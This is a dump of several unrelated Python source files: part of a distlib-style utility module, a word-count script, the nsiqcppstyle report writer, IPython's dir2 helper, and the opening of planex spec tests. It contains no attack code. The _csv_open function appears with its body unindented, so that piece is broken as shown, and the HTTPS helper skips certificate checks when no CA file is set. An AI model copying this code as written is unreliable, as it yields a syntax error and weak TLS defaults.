                t = float(self.max - self.min)
                t /= self.cur - self.min
                t = (t - 1) * self.elapsed
        return '%s: %s' % (prefix, self.format_duration(t))
    @property
    def speed(self):
        """Average rate as a human-readable string, e.g. '12 KB/s'."""
        if self.elapsed == 0:
            result = 0.0
        else:
            result = (self.cur - self.min) / self.elapsed
        for unit in UNITS:
            if result < 1000:
                break
            result /= 1000.0
        return '%d %sB/s' % (result, unit)
#
# Glob functionality
#
# Matches one {opt1,opt2,...} alternation group in a rich glob.
RICH_GLOB = re.compile(r'\{([^}]*)\}')
# '**' must stand alone as a path component; anything adjacent is invalid.
_CHECK_RECURSIVE_GLOB = re.compile(r'[^/\\,{]\*\*|\*\*[^/\\,}]')
# Detects an unmatched '{' or '}' in a glob.
_CHECK_MISMATCH_SET = re.compile(r'^[^{]*\}|\{[^}]*$')
def iglob(path_glob):
    """Extended globbing function that supports ** and {opt1,opt2,opt3}."""
    # Validate up front so errors surface immediately rather than on the
    # first iteration of the returned generator.
    if _CHECK_RECURSIVE_GLOB.search(path_glob):
        msg = """invalid glob %r: recursive glob "**" must be used alone"""
        raise ValueError(msg % path_glob)
    if _CHECK_MISMATCH_SET.search(path_glob):
        msg = """invalid glob %r: mismatching set marker '{' or '}'"""
        raise ValueError(msg % path_glob)
    return _iglob(path_glob)
def _iglob(path_glob):
    """Recursive worker for iglob(); yields matching paths."""
    # Expand one {a,b,c} alternation, then recurse on each expansion.
    rich_path_glob = RICH_GLOB.split(path_glob, 1)
    if len(rich_path_glob) > 1:
        assert len(rich_path_glob) == 3, rich_path_glob
        # NOTE(review): 'set' shadows the builtin within this branch.
        prefix, set, suffix = rich_path_glob
        for item in set.split(','):
            for path in _iglob(''.join((prefix, item, suffix))):
                yield path
    else:
        if '**' not in path_glob:
            # Plain glob - delegate to the stdlib implementation.
            for item in std_iglob(path_glob):
                yield item
        else:
            # Recursive glob: walk everything under the prefix and apply
            # the remainder of the pattern at each directory level.
            prefix, radical = path_glob.split('**', 1)
            if prefix == '':
                prefix = '.'
            if radical == '':
                radical = '*'
            else:
                # we support both
                radical = radical.lstrip('/')
                radical = radical.lstrip('\\')
            for path, dir, files in os.walk(prefix):
                path = os.path.normpath(path)
                for fn in _iglob(os.path.join(path, radical)):
                    yield fn
if ssl:
    from .compat import (HTTPSHandler as BaseHTTPSHandler, match_hostname,
                         CertificateError)

#
# HTTPSConnection which verifies certificates/matches domains
#

    class HTTPSConnection(httplib.HTTPSConnection):
        ca_certs = None # set this to the path to the certs file (.pem)
        check_domain = True # only used if ca_certs is not None

        # noinspection PyPropertyAccess
        def connect(self):
            """Connect and wrap the socket in TLS, optionally verifying
            the server certificate and matching the hostname."""
            sock = socket.create_connection((self.host, self.port), self.timeout)
            if getattr(self, '_tunnel_host', False):
                self.sock = sock
                self._tunnel()
            if not hasattr(ssl, 'SSLContext'):
                # For 2.x
                if self.ca_certs:
                    cert_reqs = ssl.CERT_REQUIRED
                else:
                    cert_reqs = ssl.CERT_NONE
                self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
                                            cert_reqs=cert_reqs,
                                            ssl_version=ssl.PROTOCOL_SSLv23,
                                            ca_certs=self.ca_certs)
            else:  # pragma: no cover
                # NOTE(review): PROTOCOL_SSLv23 is the legacy "negotiate"
                # constant; only SSLv2 is explicitly disabled here.
                context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
                context.options |= ssl.OP_NO_SSLv2
                if self.cert_file:
                    context.load_cert_chain(self.cert_file, self.key_file)
                kwargs = {}
                if self.ca_certs:
                    context.verify_mode = ssl.CERT_REQUIRED
                    context.load_verify_locations(cafile=self.ca_certs)
                    if getattr(ssl, 'HAS_SNI', False):
                        kwargs['server_hostname'] = self.host
                self.sock = context.wrap_socket(sock, **kwargs)
            if self.ca_certs and self.check_domain:
                try:
                    match_hostname(self.sock.getpeercert(), self.host)
                    logger.debug('Host verified: %s', self.host)
                except CertificateError:  # pragma: no cover
                    # Tear down the socket before propagating the failure.
                    self.sock.shutdown(socket.SHUT_RDWR)
                    self.sock.close()
                    raise

    class HTTPSHandler(BaseHTTPSHandler):
        def __init__(self, ca_certs, check_domain=True):
            BaseHTTPSHandler.__init__(self)
            self.ca_certs = ca_certs
            self.check_domain = check_domain

        def _conn_maker(self, *args, **kwargs):
            """
            This is called to create a connection instance. Normally you'd
            pass a connection class to do_open, but it doesn't actually check for
            a class, and just expects a callable. As long as we behave just as a
            constructor would have, we should be OK. If it ever changes so that
            we *must* pass a class, we'll create an UnsafeHTTPSConnection class
            which just sets check_domain to False in the class definition, and
            choose which one to pass to do_open.
            """
            result = HTTPSConnection(*args, **kwargs)
            if self.ca_certs:
                result.ca_certs = self.ca_certs
                result.check_domain = self.check_domain
            return result

        def https_open(self, req):
            try:
                return self.do_open(self._conn_maker, req)
            except URLError as e:
                # Re-raise verification failures with a clearer message.
                if 'certificate verify failed' in str(e.reason):
                    raise CertificateError('Unable to verify server certificate '
                                           'for %s' % req.host)
                else:
                    raise

#
# To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The-
# Middle proxy using HTTP listens on port 443, or an index mistakenly serves
# HTML containing a http://xyz link when it should be https://xyz),
# you can use the following handler class, which does not allow HTTP traffic.
#
# It works by inheriting from HTTPHandler - so build_opener won't add a
# handler for HTTP itself.
#
    class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
        def http_open(self, req):
            raise URLError('Unexpected HTTP request on what should be a secure '
                           'connection: %s' % req)
#
# XML-RPC with timeouts
#
# XML-RPC transports with timeout support; Python 2.6 needs shim classes
# because its httplib connection classes don't accept a timeout directly.
_ver_info = sys.version_info[:2]

if _ver_info == (2, 6):
    class HTTP(httplib.HTTP):
        # Shim so extra kwargs (e.g. timeout) reach the connection class.
        def __init__(self, host='', port=None, **kwargs):
            if port == 0:   # 0 means use port 0, not the default port
                port = None
            self._setup(self._connection_class(host, port, **kwargs))

    if ssl:
        class HTTPS(httplib.HTTPS):
            # Same shim for the TLS flavour.
            def __init__(self, host='', port=None, **kwargs):
                if port == 0:   # 0 means use port 0, not the default port
                    port = None
                self._setup(self._connection_class(host, port, **kwargs))

class Transport(xmlrpclib.Transport):
    """xmlrpclib Transport that applies a connection timeout."""
    def __init__(self, timeout, use_datetime=0):
        self.timeout = timeout
        xmlrpclib.Transport.__init__(self, use_datetime)

    def make_connection(self, host):
        h, eh, x509 = self.get_host_info(host)
        if _ver_info == (2, 6):
            result = HTTP(h, timeout=self.timeout)
        else:
            # Reuse the cached connection when talking to the same host.
            if not self._connection or host != self._connection[0]:
                self._extra_headers = eh
                self._connection = host, httplib.HTTPConnection(h)
            result = self._connection[1]
        return result

if ssl:
    class SafeTransport(xmlrpclib.SafeTransport):
        """xmlrpclib SafeTransport (HTTPS) that applies a timeout."""
        def __init__(self, timeout, use_datetime=0):
            self.timeout = timeout
            xmlrpclib.SafeTransport.__init__(self, use_datetime)

        def make_connection(self, host):
            h, eh, kwargs = self.get_host_info(host)
            if not kwargs:
                kwargs = {}
            kwargs['timeout'] = self.timeout
            if _ver_info == (2, 6):
                # NOTE(review): this passes *host* while the parallel code
                # above passes *h* - confirm the asymmetry is intended.
                result = HTTPS(host, None, **kwargs)
            else:
                if not self._connection or host != self._connection[0]:
                    self._extra_headers = eh
                    self._connection = host, httplib.HTTPSConnection(h, None,
                                                                     **kwargs)
                result = self._connection[1]
            return result

class ServerProxy(xmlrpclib.ServerProxy):
    """ServerProxy accepting a 'timeout' kwarg, wired through the
    timeout-aware transports above."""
    def __init__(self, uri, **kwargs):
        self.timeout = timeout = kwargs.pop('timeout', None)
        # The above classes only come into play if a timeout
        # is specified
        if timeout is not None:
            scheme, _ = splittype(uri)
            use_datetime = kwargs.get('use_datetime', 0)
            if scheme == 'https':
                tcls = SafeTransport
            else:
                tcls = Transport
            kwargs['transport'] = t = tcls(timeout, use_datetime=use_datetime)
            self.transport = t
        xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += 'b'
else:
kwargs['newline'] = ''
# Python 3 determines encoding from locale. Force 'utf-8'
# file encoding to match other forced utf-8 encoding
kwargs['encoding'] = 'utf-8'
return open(fn, mode, **kwargs)
class CSVBase(object):
    """Shared csv dialect options and context-manager support for
    CSVReader/CSVWriter; subclasses must set self.stream."""
    defaults = {
        'delimiter': str(','),      # The strs are used because we need native
        'quotechar': str('"'),      # str in the csv API (2.x won't take
        'lineterminator': str('\n') # Unicode)
    }

    def __enter__(self):
        return self

    def __exit__(self, *exc_info):
        # Close the underlying stream opened/assigned by the subclass.
        self.stream.close()
class CSVReader(CSVBase):
    """Row iterator over a CSV stream or path, yielding unicode values
    on both Python 2 and 3."""
    def __init__(self, **kwargs):
        # Accepts either 'stream' (a binary stream on 3.x, wrapped in a
        # utf-8 reader) or 'path' (opened via _csv_open).
        if 'stream' in kwargs:
            stream = kwargs['stream']
            if sys.version_info[0] >= 3:
                # needs to be a text stream
                stream = codecs.getreader('utf-8')(stream)
            self.stream = stream
        else:
            self.stream = _csv_open(kwargs['path'], 'r')
        self.reader = csv.reader(self.stream, **self.defaults)

    def __iter__(self):
        return self

    def next(self):
        """Return the next row, decoding bytes to unicode on Python 2."""
        result = next(self.reader)
        if sys.version_info[0] < 3:
            for i, item in enumerate(result):
                if not isinstance(item, text_type):
                    result[i] = item.decode('utf-8')
        return result

    # Python 3 iterator-protocol alias for the 2.x-style next().
    __next__ = next
class CSVWriter(CSVBase):
    """CSV writer accepting unicode rows on both Python 2 and 3."""
    def __init__(self, fn, **kwargs):
        self.stream = _csv_open(fn, 'w')
        self.writer = csv.writer(self.stream, **self.defaults)

    def writerow(self, row):
        """Write one row, encoding unicode values to utf-8 on Python 2
        (the 2.x csv module only accepts native str)."""
        if sys.version_info[0] < 3:
            r = []
            for item in row:
                if isinstance(item, text_type):
                    item = item.encode('utf-8')
                r.append(item)
            row = r
        self.writer.writerow(row)
#
# Configurator functionality
#
class Configurator(BaseConfigurator):
    """Configurator adding an 'inc://' value converter and custom-object
    construction via dict specs with '()' (callable), '[]' (positional
    args) and '.' (post-construction attributes) keys. Relative inc://
    paths are resolved against *base*."""

    value_converters = dict(BaseConfigurator.value_converters)
    value_converters['inc'] = 'inc_convert'

    def __init__(self, config, base=None):
        super(Configurator, self).__init__(config)
        # Base directory for resolving relative inc:// includes.
        self.base = base or os.getcwd()

    def configure_custom(self, config):
        """Instantiate the object described by *config*, a dict whose
        '()' key names (or is) the callable to invoke."""
        def convert(o):
            # Recursively convert containers and nested custom specs.
            if isinstance(o, (list, tuple)):
                result = type(o)([convert(i) for i in o])
            elif isinstance(o, dict):
                if '()' in o:
                    result = self.configure_custom(o)
                else:
                    result = {}
                    for k in o:
                        result[k] = convert(o[k])
            else:
                result = self.convert(o)
            return result

        c = config.pop('()')
        if not callable(c):
            c = self.resolve(c)
        props = config.pop('.', None)
        # Check for valid identifiers
        args = config.pop('[]', ())
        if args:
            args = tuple([convert(o) for o in args])
        items = [(k, convert(config[k])) for k in config if valid_ident(k)]
        kwargs = dict(items)
        result = c(*args, **kwargs)
        if props:
            for n, v in props.items():
                setattr(result, n, convert(v))
        return result

    def __getitem__(self, key):
        # Lazily instantiate custom specs on first access, caching the
        # constructed object back into the config.
        result = self.config[key]
        if isinstance(result, dict) and '()' in result:
            self.config[key] = result = self.configure_custom(result)
        return result

    def inc_convert(self, value):
        """Default converter for the inc:// protocol."""
        if not os.path.isabs(value):
            value = os.path.join(self.base, value)
        with codecs.open(value, 'r', encoding='utf-8') as f:
            result = json.load(f)
        return result
class SubprocessMixin(object):
    """
    Mixin for running subprocesses and capturing their output
    """
    def __init__(self, verbose=False, progress=None):
        # progress: optional callable(line, context) fed each output line.
        self.verbose = verbose
        self.progress = progress

    def reader(self, stream, context):
        """
        Read lines from a subprocess' output stream and either pass to a progress
        callable (if specified) or write progress information to sys.stderr.
        """
        progress = self.progress
        verbose = self.verbose
        while True:
            s = stream.readline()
            if not s:
                break
            if progress is not None:
                progress(s, context)
            else:
                if not verbose:
                    sys.stderr.write('.')
                else:
                    sys.stderr.write(s.decode('utf-8'))
                sys.stderr.flush()
        stream.close()

    def run_command(self, cmd, **kwargs):
        """Run *cmd*, draining stdout/stderr on reader threads to avoid
        pipe-buffer deadlock; returns the completed Popen object."""
        p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE, **kwargs)
        t1 = threading.Thread(target=self.reader, args=(p.stdout, 'stdout'))
        t1.start()
        t2 = threading.Thread(target=self.reader, args=(p.stderr, 'stderr'))
        t2.start()
        p.wait()
        t1.join()
        t2.join()
        if self.progress is not None:
            self.progress('done.', 'main')
        elif self.verbose:
            sys.stderr.write('done.\n')
        return p
def normalize_name(name):
    """Normalize a python package name a la PEP 503"""
    # https://www.python.org/dev/peps/pep-0503/#normalized-names
    collapsed = re.sub(r'[-_.]+', '-', name)
    return collapsed.lower()
|
lastralab/Statistics | refs/heads/master | Specialization/Dr. Chuck-s Code/count1.py | 2 | fname = raw_input('Enter the file name: ')
# NOTE(review): `fname` is read via raw_input() on the preceding line
# (this is a Python 2 script).
try:
    fhand = open(fname)
except:
    # Bare except also catches KeyboardInterrupt/SystemExit; kept as-is.
    print 'File cannot be opened:', fname
    exit()
# Histogram mapping each whitespace-separated word to its occurrence count.
counts = dict()
for line in fhand:
    words = line.split()
    for word in words:
        if word not in counts:
            counts[word] = 1
        else:
            counts[word] += 1
print counts
|
jhbradley/moose | refs/heads/devel | framework/contrib/nsiqcppstyle/nsiqcppstyle_reporter.py | 43 | # Copyright (c) 2009 NHN Inc. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of NHN Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import nsiqcppstyle_state
import nsiqcppstyle_checker
import nsiqcppstyle_rulemanager
import sys
import csv
import os
####################################################################################################
csvfile = None
writer = None
target = None
def PrepareReport(outputPath, format) :
    """
    Set up sth like report headers.

    Opens the output stream for the requested format ("csv", "xml" or
    "html") and writes the report preamble.  Populates the module globals
    `writer` (csv.writer or raw file object) and, for csv, `csvfile`
    (the underlying file handle).
    """
    # FIX: `csvfile` was previously assigned without a `global` declaration,
    # so the module-level handle stayed None and the csv file could never be
    # closed by other code in this module.
    global writer, csvfile
    if format == "csv" :
        if os.path.isdir(outputPath) :
            outputPath = os.path.join(outputPath, "nsiqcppstyle_report.csv")
        csvfile = file(outputPath, "wb")
        writer = csv.writer(csvfile)
        writer.writerow(("File", "Line", "Column", "Message", "Rule", "Rule Url"))
    elif format == "xml" :
        if os.path.isdir(outputPath) :
            outputPath = os.path.join(outputPath, "nsiqcppstyle_report.xml")
        writer = file(outputPath, "wb")
        writer.write("<?xml version='1.0'?>\n<checkstyle version='4.4'>\n")
    elif format == "html" :
        if os.path.isdir(outputPath) :
            outputPath = os.path.join(outputPath, "nsiqcppstyle_report.html")
        writer = file(outputPath, "wb")
        writer.write("""<!DOCTYPE html><html><body><head></head><font size=2><ul id="main">\n""")
def ReportSummaryToScreen(analyzedFiles, nsiqcppstyle_state, filter, ciMode) :
    """
    Report Summary Info into the screen.

    In quiet mode only the html report (plus a one-line coverage figure)
    is produced; otherwise a full textual summary is printed to stdout.
    """
    if _nsiqcppstyle_state.quiet == True:
        if _nsiqcppstyle_state.output_format == 'html':
            global writer
            fileCount = len(analyzedFiles)
            violatedFileCount = len(nsiqcppstyle_state.errorPerFile.keys())
            # buildQuality: percentage of analyzed files with no violations.
            buildQuality = 0
            if fileCount != 0 :
                buildQuality = (fileCount - violatedFileCount) * 100.0 / fileCount
            writer.write("""<hr /><br>================================== Summary Report ===================================<br> ** Total Available Rules : %d<br> ** Total Applied Rules : %d<br> ** Total Violated Rules : %d<br> ** Total Errors Occurs : %d<br> ** Total Analyzed Files : %d<br> ** Total Violated Files Count: %d<br> ** Build Quality : %.2f%%<br>""" % (nsiqcppstyle_rulemanager.ruleManager.availRuleCount, len(nsiqcppstyle_state.checkers), len(nsiqcppstyle_state.errorPerChecker.keys()), nsiqcppstyle_state.error_count, len(analyzedFiles), violatedFileCount, buildQuality))
            writer.write("""<br>================================== Applied Rules ===================================<br>\n""")
            for checker in nsiqcppstyle_state.errorPerChecker.keys() :
                writer.write(""" ** Rule violated: %s: %d times<br>\n""" % (checker, nsiqcppstyle_state.errorPerChecker[checker]))
            print 'Syntax Comment Coverage: ' + str(buildQuality)[:4] + '%'
    else:
        fileCount = len(analyzedFiles)
        violatedFileCount = len(nsiqcppstyle_state.errorPerFile.keys())
        buildQuality = 0
        if fileCount != 0 :
            buildQuality = (fileCount - violatedFileCount) * 100.0 / fileCount
        print "\n"
        print ("=================================== Summary Report ===================================");
        print (" ** Total Available Rules : %d" % nsiqcppstyle_rulemanager.ruleManager.availRuleCount)
        print (" ** Total Applied Rules : %d" % len(nsiqcppstyle_state.checkers))
        print (" ** Total Violated Rules : %d" % len(nsiqcppstyle_state.errorPerChecker.keys()))
        print (" ** Total Errors Occurs : %d" % nsiqcppstyle_state.error_count)
        print (" ** Total Analyzed Files : %d" % len(analyzedFiles))
        print (" ** Total Violated Files Count: %d" % violatedFileCount)
        print (" ** Build Quality : %.2f%%" % buildQuality)
        # Per-rule and per-file breakdowns are suppressed in CI mode.
        if not ciMode :
            print ("\n================================ Violated Rule Details ===============================")
            for checker in nsiqcppstyle_state.errorPerChecker.keys() :
                print " - ", checker, "rule violated :", nsiqcppstyle_state.errorPerChecker[checker]
            print ("\n================================ Violated File Details ===============================")
            for eachFile in nsiqcppstyle_state.errorPerFile.keys() :
                count = 0
                for eachRule in nsiqcppstyle_state.errorPerFile[eachFile].keys() :
                    count += nsiqcppstyle_state.errorPerFile[eachFile][eachRule]
                print " - ", eachFile, " violated in total : ", count
                for eachRule in nsiqcppstyle_state.errorPerFile[eachFile].keys() :
                    print " * ", eachRule, " : ", nsiqcppstyle_state.errorPerFile[eachFile][eachRule]
def CloseReport(format):
    """Write the closing markup for xml/html reports and close the writer.

    csv output needs no footer, so other formats are left untouched.
    """
    global writer
    footers = {
        "xml": "</checkstyle>\n",
        "html": "</ul></font></body></html>\n",
    }
    footer = footers.get(format)
    if footer is not None:
        writer.write(footer)
        writer.close()
####################################################################################################
#ruleMap = {}
def IsRuleUsed(ruleName, ruleNames):
    """Return the string "true" when ruleName occurs in ruleNames, else "false".

    String (not bool) results are intentional: they feed XML attribute values.
    """
    return "true" if ruleName in ruleNames else "false"
def ReportRules(availRuleName, ruleNames):
    """Placeholder hook for reporting available/used rules.

    The original XML rule-list emission (rules/rule elements with a
    ruleDoc URL per available rule) is intentionally disabled; this
    function is kept as a no-op so callers need not change.
    """
    pass
def StartDir(dirname):
    """Hook invoked when analysis enters a directory; xml dir tags are disabled."""
    if _nsiqcppstyle_state.output_format != 'xml':
        return
    # writer.write("<dir name='%s'>\n" % (dirname))
def EndDir():
    """Hook invoked when analysis leaves a directory; xml dir tags are disabled."""
    if _nsiqcppstyle_state.output_format != 'xml':
        return
    # writer.write("</dir>\n")
def StartTarget(targetname):
    """ Write Report when each target is analyzed.

    For xml output, remembers the target name in the module-level `target`
    so StartFile can build the reported path.
    """
    global target
    if _nsiqcppstyle_state.output_format != 'xml':
        return
    target = targetname
    # writer.write("<target name='%s'>\n" % (targetname))
def EndTarget():
    """ Write Report when each target is ended; xml target tags are disabled."""
    if _nsiqcppstyle_state.output_format != 'xml':
        return
    # writer.write("</target>\n")
def StartFile(dirname, filename):
    """Emit the opening <file> element for xml output."""
    if _nsiqcppstyle_state.output_format != 'xml':
        return
    # dirname[1:] drops the leading '.' of a './'-style relative path
    # before joining onto the current target name.
    relpath = os.path.join(target, dirname[1:], filename)
    writer.write("<file name='%s'>\n" % relpath)
def EndFile():
    """Close the current <file> element in xml output."""
    if _nsiqcppstyle_state.output_format != 'xml':
        return
    writer.write("</file>\n")
_nsiqcppstyle_state = nsiqcppstyle_state._nsiqcppstyle_state
def __dict_replace(s, d):
    """Replace substrings of a string using a dictionary."""
    result = s
    for pattern, substitute in d.items():
        result = result.replace(pattern, substitute)
    return result
def escape(data, entities={}):
    """Escape &, <, and > in a string of data.

    You can escape other strings of data by passing a dictionary as
    the optional entities parameter.  The keys and values must all be
    strings; each key will be replaced with its corresponding value.
    """
    # FIX: the replacement strings had been corrupted into identity
    # replacements (e.g. '&' -> '&'); restore the XML entities.
    # Ampersand must be done first so the '&' characters introduced by
    # the other substitutions are not double-escaped.
    data = data.replace("&", "&amp;")
    data = data.replace(">", "&gt;")
    data = data.replace("<", "&lt;")
    if entities:
        data = __dict_replace(data, entities)
    return data
def ErrorInternal(t, ruleName, message):
    """
    Print error

    Records and emits one style violation at token *t* in the configured
    output format, unless the offending line carries a '// NS' suppression
    comment or the rule is suppressed globally.
    """
    global rule  # NOTE(review): 'rule' is never assigned or read here; looks vestigial.
    # Strip a fixed 6-character prefix from the rule name.
    # NOTE(review): presumably the "RULE_A"/module prefix of checker names -- confirm.
    ruleName = ruleName[6:]
    if t == None :
        return
    # Skip when the source line opts out via a '// NS' comment or the rule
    # is suppressed in the global state.
    if nsiqcppstyle_checker.Search(r"//\s*NS", t.line) == None and not _nsiqcppstyle_state.CheckRuleSuppression(ruleName):
        _nsiqcppstyle_state.IncrementErrorCount(ruleName, t.filename)
        url = ""
        if _nsiqcppstyle_state.showUrl :
            url = "http://nsiqcppstyle.appspot.com/rule_doc/" + ruleName
        if _nsiqcppstyle_state.output_format == 'emacs':
            sys.stdout.write('%s:%s: %s [%s] %s\n' % (
                t.filename, t.lineno, message, ruleName, url))
        elif _nsiqcppstyle_state.output_format == 'vs7':
            sys.stdout.write('%s(%s, %s): %s [%s] %s\n' % (
                t.filename, t.lineno, t.column, message, ruleName, url))
        elif _nsiqcppstyle_state.output_format == 'eclipse':
            sys.stdout.write(' File "%s", line %d %s (%s)\n' %(t.filename, t.lineno, message, ruleName))
        elif _nsiqcppstyle_state.output_format == 'csv':
            global writer
            writer.writerow((t.filename, t.lineno, t.column, message, ruleName, url))
        elif _nsiqcppstyle_state.output_format == 'xml':
            writer.write("""<error line='%d' col='%d' severity='warning' message='%s' source='%s'/>\n""" % (t.lineno, t.column, escape(message).replace("'", "\""), ruleName))
        elif _nsiqcppstyle_state.output_format == 'html':
            # NOTE(review): both branches below are byte-identical; the
            # baseURL check currently has no effect -- confirm intent.
            if _nsiqcppstyle_state.baseURL != '':
                writer.write("""<li id="link"><a href=%s/%s#L%d>%s</a><ul id="detail"><li id="line">Line: %d - Column: %d</li><li id="rule">Rule: %s</li></ul>\n""" % (_nsiqcppstyle_state.baseURL, t.filename[t.filename.find(_nsiqcppstyle_state.base_dir):], t.lineno, t.filename[t.filename.find(_nsiqcppstyle_state.base_dir):].split('/').pop(), t.lineno, t.column, escape(message).replace("'", "\"")))
            else:
                writer.write("""<li id="link"><a href=%s/%s#L%d>%s</a><ul id="detail"><li id="line">Line: %d - Column: %d</li><li id="rule">Rule: %s</li></ul>\n""" % (_nsiqcppstyle_state.baseURL, t.filename[t.filename.find(_nsiqcppstyle_state.base_dir):], t.lineno, t.filename[t.filename.find(_nsiqcppstyle_state.base_dir):].split('/').pop(), t.lineno, t.column, escape(message).replace("'", "\"")))
Error = ErrorInternal
class DummyToken:
    """Minimal stand-in for a lexer token carrying only location info."""

    def __init__(self, filename, line, lineno, column):
        self.filename = filename
        self.line = line
        # Positions reported as line 0 are clamped to 1 so reports are valid.
        self.lineno = lineno if lineno != 0 else 1
        self.column = column
|
marinho/geraldo | refs/heads/master | site/newsite/site-geraldo/django/core/cache/backends/__init__.py | 12133432 | |
Radagast-red/golem | refs/heads/develop | golem/rpc/mapping/__init__.py | 12133432 | |
hellofreedom/ansible-modules-core | refs/heads/devel | cloud/amazon/__init__.py | 12133432 | |
sodafree/backend | refs/heads/master | build/ipython/build/lib.linux-i686-2.7/IPython/utils/dir2.py | 5 | # encoding: utf-8
"""A fancy version of Python's builtin :func:`dir` function.
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2008-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
def get_class_members(cls):
    """Return dir(cls) extended, recursively, with the names of all bases."""
    names = dir(cls)
    # getattr with a default tolerates objects that lie to hasattr and
    # raise on actual __bases__ access (e.g. Pyro proxies).
    bases = getattr(cls, '__bases__', None)
    if bases is not None:
        for base in bases:
            names.extend(get_class_members(base))
    return names
def dir2(obj):
    """dir2(obj) -> list of strings
    Extended version of the Python builtin dir(), which does a few extra
    checks, and supports common objects with unusual internals that confuse
    dir(), such as Traits and PyCrust.
    This version is guaranteed to return only a list of true strings, whereas
    dir() returns anything that objects inject into themselves, even if they
    are later not really valid for attribute access (many extension libraries
    have such bugs).
    """
    # Start building the attribute list via dir(), and then complete it
    # with a few extra special-purpose calls.
    words = set(dir(obj))
    if hasattr(obj, '__class__'):
        #words.add('__class__')
        words |= set(get_class_members(obj.__class__))
    # for objects with Enthought's traits, add trait_names() list
    # for PyCrust-style, add _getAttributeNames() magic method list
    for attr in ('trait_names', '_getAttributeNames'):
        if hasattr(obj, attr):
            try:
                func = getattr(obj, attr)
                if callable(func):
                    words |= set(func())
            except:
                # TypeError: obj is class not instance
                pass
    # filter out non-string attributes which may be stuffed by dir() calls
    # and poor coding in third-party modules
    # NOTE(review): `basestring` is Python 2 only; under Python 3 this line
    # raises NameError -- this module predates the py3 port.
    words = [w for w in words if isinstance(w, basestring)]
    return sorted(words)
|
jonludlam/planex | refs/heads/master | tests/test_planex_spec.py | 2 | # Run these tests with 'nosetests':
# install the 'python-nose' package (Fedora/CentOS or Ubuntu)
# run 'nosetests' in the root of the repository
import unittest
import platform
import planex.spec
def get_rpm_machine():
    """Map the host architecture to the RPM arch label ('x86_64' or 'i386')."""
    return 'x86_64' if platform.machine() == 'x86_64' else 'i386'
def get_deb_machine():
    """Map the host architecture to the Debian arch label ('amd64' or 'i386')."""
    return 'amd64' if platform.machine() == 'x86_64' else 'i386'
class RpmTests(unittest.TestCase):
    """Exercises planex.spec.Spec parsing of an RPM spec fixture."""

    def setUp(self):
        # 'setUp' breaks Pylint's naming rules
        # pylint: disable=C0103
        self.spec = planex.spec.Spec("tests/data/ocaml-cohttp.spec",
                                     dist=".el6")

    def test_good_filename_preprocessor(self):
        # A .spec.in file whose basename matches its Name: must load cleanly.
        planex.spec.Spec("tests/data/ocaml-cohttp.spec.in")

    def test_bad_filename(self):
        # Filename/Name mismatch must be rejected.
        self.assertRaises(planex.spec.SpecNameMismatch, planex.spec.Spec,
                          "tests/data/bad-name.spec")

    def test_bad_filename_preprocessor(self):
        self.assertRaises(planex.spec.SpecNameMismatch, planex.spec.Spec,
                          "tests/data/bad-name.spec.in")

    def test_name(self):
        self.assertEqual(self.spec.name(), "ocaml-cohttp")

    def test_specpath(self):
        self.assertEqual(self.spec.specpath(), "./SPECS/ocaml-cohttp.spec")

    def test_version(self):
        self.assertEqual(self.spec.version(), "0.9.8")

    def test_provides(self):
        self.assertEqual(self.spec.provides(),
                         set(["ocaml-cohttp", "ocaml-cohttp-devel"]))

    def test_source_urls(self):
        self.assertEqual(self.spec.source_urls(),
                         ["https://github.com/mirage/ocaml-cohttp/archive/"
                          "ocaml-cohttp-0.9.8/ocaml-cohttp-0.9.8.tar.gz",
                          "file:///code/ocaml-cohttp-extra#ocaml-cohttp-extra-0.9.8.tar.gz",
                          "ocaml-cohttp-init"])

    def test_source_paths(self):
        self.assertEqual(self.spec.source_paths(),
                         ["./SOURCES/ocaml-cohttp-0.9.8.tar.gz",
                          "./SOURCES/ocaml-cohttp-extra-0.9.8.tar.gz",
                          "./SOURCES/ocaml-cohttp-init"])

    def test_buildrequires(self):
        self.assertEqual(self.spec.buildrequires(),
                         set(["ocaml", "ocaml-findlib", "ocaml-re-devel",
                              "ocaml-uri-devel", "ocaml-cstruct-devel",
                              "ocaml-lwt-devel", "ocaml-ounit-devel",
                              "ocaml-ocamldoc", "ocaml-camlp4-devel",
                              "openssl", "openssl-devel"]))

    def test_source_package_path(self):
        self.assertEqual(self.spec.source_package_path(),
